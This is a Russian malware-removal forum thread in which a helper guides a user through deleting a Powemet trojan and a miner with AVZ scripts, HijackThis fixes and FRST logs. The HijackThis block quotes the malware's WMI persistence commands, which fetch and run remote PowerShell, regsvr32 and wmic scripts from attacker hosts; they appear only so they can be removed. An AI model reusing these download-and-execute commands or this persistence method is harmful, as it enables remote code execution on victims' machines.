Подцепил Trojan:Win32/Powemet.A!attk и, возможно, что-то ещё

Printable View

28.09.2022, 13:14
Dzarabr

Вложений: 1

Подцепил Trojan:Win32/Powemet.A!attk и, возможно, что-то ещё

Подцепил Trojan:Win32/Powemet.A!attk
Были ещё вредоносы, но они удалились с помощью Trojan Remover.
А этот не хочет, что с ним делать?
28.09.2022, 13:17
Info_bot

Уважаемый(ая) [B]Dzarabr[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
28.09.2022, 14:50
Sandor

Здравствуйте!

Видны следы нескольких вредоносов. Будем чистить последовательно.

Скачайте [url=https://disk.yandex.ru/d/PeIBzcz_WX_DCg]AV block remover[/url].
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV-br.exe (или любое другое имя).

В результате работы утилиты появится отчёт [b]AV_block_remove_дата-время.log[/b], прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый [b]CollectionLog[/b] Автологером.
29.09.2022, 14:45
Dzarabr

Вложений: 2

Сделал!!
29.09.2022, 15:01
Sandor

Хорошо, продолжаем.

[URL="http://virusinfo.info/showthread.php?t=130828"][B]Временно[/B] отключите защитное ПО[/URL].
[URL="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/URL]:

[CODE]begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
ClearQuarantineEx(true);
QuarantineFile('c:\windows\Adobeupdate.exe', '');
QuarantineFile('c:\windows\help\AdobeFlac.exe', '');
DeleteSchedulerTask('AdobeUpdateFlac');
DeleteSchedulerTask('AdobeUpdateFlac2');
DeleteFile('c:\windows\Adobeupdate.exe', '64');
DeleteFile('c:\windows\help\AdobeFlac.exe', '64');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
[/CODE]

Компьютер [U]перезагрузится[/U].

[URL="http://virusinfo.info/showthread.php?t=4491"]"Пофиксите" в HijackThis[/URL]:
[CODE]
O1 - Hosts: Reset contents to default
O22 - Tasks: Trojan Remover - C:\Program Files\Loaris Trojan Remover\ltr.exe
O25 - WMI Event: bacru4 - bacru3 - Event="__InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.oopmus.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://bec.rocop.ru:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oopmus.ru:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oopmus.ru:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi22.oopmus.xyz:8080/power.txt')||regsvr32 /u /s /i:http://oopmus.xyz:8080/s22.txt scrobj.dll&wmic os get /FORMAT:\"http://wmi2.oopmus.xyz:8220/s2.xsl"
O25 - WMI Event: tosa4 - tosa3 - Event="__InstanceModificationEvent WITHIN 10500 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.webpublicservices.org:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://webpublicservices.org:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://webpublicservices.org:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi22.ha7455h6fi1.net:8080/power.txt')||regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s22.txt scrobj.dll&wmic os get /FORMAT:\"http://wmi2.ha7455h6fi1.net:8220/s2.xsl"

[/CODE]

Перезагрузите компьютер.

Скачайте [URL="https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] (или с [URL="https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/"]зеркала[/URL]) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите [B]Да[/B] для соглашения с предупреждением.

Нажмите кнопку [B]Сканировать[/B] ([B]Scan[/B]).
После окончания сканирования будут созданы отчеты [B]FRST.txt[/B] и [B]Addition.txt[/B] в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
29.09.2022, 22:43
Dzarabr

Вложений: 2

Сделал!
Да, троян-майнер был, я думал он полностью удалился...
Кстати, ещё вопрос, у меня почему-то прекратили работать плагины VPN для браузера Google Chrome. Это может быть связано со зловредами? Или просто совпало?
30.09.2022, 09:04
Sandor

Вложений: 1

Скачайте вложенный архив, извлеките из него reg-файл и запустите. Согласитесь с внесением изменений в реестр.
Перезагрузите компьютер, удалите старые и соберите новые логи FRST.txt и Addition.txt
30.09.2022, 10:15
Dzarabr

Вложений: 2

Готово!!
30.09.2022, 11:26
Sandor

[quote="Dzarabr;1525717"]Или просто совпало?[/quote]
Скорее всего просто совпало.

Я пробовал поправить не запущенную службу теневого копирования и не получилось.
Впрочем, это выходит за рамки тематики данного форума.

Если основная проблема решена, в завершение:
1.
Переименуйте FRST.exe (или FRST64.exe) в [B]uninstall.exe[/B] и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.[LIST][*]Загрузите [B][URL=https://www.comss.ru/page.php?id=1813]SecurityCheck by glax24 & Severnyj[/URL][/B], сохраните утилиту на [I]Рабочем столе[/I] и извлеките из архива.[*]Запустите двойным щелчком мыши (если Вы используете [I]Windows XP[/I]) или из меню по щелчку правой кнопки мыши [I]Запустить от имени администратора[/I] (если Вы используете [I]Windows Vista/7/8/8.1/10[/I])[*]Если увидите [U]предупреждение от вашего фаервола или SmartScreen[/U] относительно программы SecurityCheck, не блокируйте ее работу[*]Дождитесь окончания сканирования, откроется лог в блокноте с именем [B]SecurityCheck.txt[/B][*]Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем [I]SecurityCheck[/I], например [I][COLOR="Blue"]C:\SecurityCheck\SecurityCheck.txt[/COLOR][/I][*]Прикрепите этот файл к своему следующему сообщению.[/LIST]
03.10.2022, 09:00
Dzarabr

Вложений: 1

Готово, всё сделал!
Получается, всё, больше никаких вирусов нет?
03.10.2022, 14:41
Sandor

------------------------------- [ Windows ] -------------------------------
Контроль учётных записей пользователя [b]включен[/b]
Запрос на повышение прав для администраторов [color=red][b]отключен[/b][/color]
[color=blue][b]^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^[/b][/color]
-------------------------- [ SecurityUtilities ] --------------------------
KeePass Password Safe 2.51.1 v.2.51.1 [color=red][b]Внимание! [url=https://keepass.info/download.html]Скачать обновления[/url][/b][/color]
--------------------------- [ OtherUtilities ] ----------------------------
NVIDIA GeForce Experience 3.20.5.70 v.3.20.5.70 [color=red][b]Внимание! [url=https://www.nvidia.com/ru-ru/geforce/geforce-experience/]Скачать обновления[/url][/b][/color]
Foxit Reader v.10.1.1.37576 [color=red][b]Внимание! [url=https://www.foxitsoftware.com/ru/pdf-reader/]Скачать обновления[/url][/b][/color]
[color=blue][b]^Локализованные версии могут обновляться позже англоязычных!^[/b][/color]
------------------------------ [ ArchAndFM ] ------------------------------
7-Zip 19.00 (x64) v.19.00 [color=red][b]Внимание! [url=https://www.7-zip.org/download.html]Скачать обновления[/url][/b][/color]
[color=blue][b]^Удалите старую версию, скачайте и установите новую.^[/b][/color]
--------------------------------- [ P2P ] ---------------------------------
qBittorrent 4.3.4.1 v.4.3.4.1 [color=red][b]Внимание! [url=https://www.qbittorrent.org/download.php]Скачать обновления[/url][/b][/color]
------------------------------- [ Browser ] -------------------------------
Google Chrome v.105.0.5195.127 [color=red][b]Внимание! [url=https://www.google.ru/intl/ru/chrome/update/]Скачать обновления[/url][/b][/color]
[color=blue][b]^Проверьте обновления через меню Справка - О браузере Google Chrome!^[/b][/color]
----------------------------- [ EmailClient ] -----------------------------
Mozilla Thunderbird (x86 ru) v.91.11.0 [color=red][b]Внимание! [url=https://www.thunderbird.net/ru/]Скачать обновления[/url][/b][/color]
---------------------------- [ UnwantedApps ] -----------------------------
Loaris Trojan Remover 3.1.60 v.3.1.60 [color=red][b]Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, [url=https://support.microsoft.com/ru-ru/help/2563254/microsoft-support-policy-for-the-use-of-registry-cleaning-utilities]программу-оптимизатор или программу очистки реестра[/url][/b][/color]. Рекомендуется деинсталляция и сканирование ПК с помощью [url=https://www.malwarebytes.org/mwb-download/]Malwarebytes Anti-Malware[/url]. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.

Будьте осторожны при установке всяких "репаков", скачанных с торрента. Лучше подобное вообще не устанавливать.

Читайте [URL="http://virusinfo.info/showthread.php?t=121902"][b]Советы и рекомендации после лечения компьютера.[/b][/URL]
05.10.2022, 08:48
Dzarabr

Да, спасибо большое!
Буду разбираться дальше
05.10.2022, 16:22
Sandor

Вложений: 1

Проделайте [url=https://virusinfo.info/showthread.php?t=227836&p=1525719&viewfull=1#post1525719]такую же[/url] процедуру с этим вложенным файлом.
06.10.2022, 07:55
Dzarabr

[QUOTE=Sandor;1525752]
---------------------------- [ UnwantedApps ] -----------------------------
Loaris Trojan Remover 3.1.60 v.3.1.60 [color=red][b]Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, [url=https://support.microsoft.com/ru-ru/help/2563254/microsoft-support-policy-for-the-use-of-registry-cleaning-utilities]программу-оптимизатор или программу очистки реестра[/url][/b][/color]. Рекомендуется деинсталляция[/QUOTE]

Loaris Trojan Remover не удаляется. Деинсталлятор не находит её. Возможно, он частично удалён и там какие-то остатки присутствуют?
Может быть его поставить заново и потом удалить?
06.10.2022, 10:11
Sandor

Пробуйте удалить принудительно через [url=http://www.geekuninstaller.com/geek.zip]Geek Uninstaller[/url]
reg-файл получилось запустить, изменения есть?
06.10.2022, 22:30
Dzarabr

Вложений: 2

Да, reg-файл запустил, отчёты прикрепил.

Geek Uninstaller пишет вот такую штуку:
Невозможно открыть файл С:\Program Files\Loaris Trojan Remover\uninst000.dat. Деинсталляция невозможна
Ошибка 5: Отказано в доступе.
07.10.2022, 09:04
Sandor

Вложений: 1

[quote="Dzarabr;1525787"]пишет вот такую штуку:
Невозможно открыть файл[/quote]
Вы пробовали правой кнопкой - Принудительное удаление?
08.10.2022, 13:58
Dzarabr

[QUOTE=Sandor;1525788]Вы пробовали правой кнопкой - Принудительное удаление?[/QUOTE]

Нет, не догадался.
Сейчас сделал, всё получилось!
Спасибо!